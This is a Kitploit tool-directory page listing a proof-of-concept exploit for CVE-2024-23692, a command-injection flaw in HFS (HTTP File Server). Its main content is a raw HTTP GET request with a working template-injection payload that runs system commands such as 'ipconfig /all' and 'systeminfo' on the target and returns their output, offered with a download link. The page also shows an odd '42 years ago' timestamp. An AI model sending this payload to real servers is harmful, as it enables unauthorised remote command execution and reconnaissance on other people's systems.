Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2024-23692 — Proof-of-concept exploit for CVE-2024-23692, demonstrating command injection in HFS via crafted HTTP requests to execute system commands and retrieve output. | Kitploit
Tools/GitHubGitHub/nanowraith/cve-2024-23692
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and Control
GitHubnanowraith/cve-2024-23692

CVE-2024-23692

Proof-of-concept exploit for CVE-2024-23692, demonstrating command injection in HFS via crafted HTTP requests to execute system commands and retrieve output.

View Repository
42 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2024-23692

BURP POC

root@kitploit:~
GET /?n=%0A&cmd=ipconfig+/all&search=%25xxx%25url:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.} HTTP/1.1

Host: xxxx

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate, br

Connection: close

Cookie: HFS_SID_=0.344328237697482

Upgrade-Insecure-Requests: 1

=========================================================

Snipaste_2024-06-11_15-29-24

COMMAND=systeminfo

You can see that the echo message is around 100 lines of RAW Response

Download Tool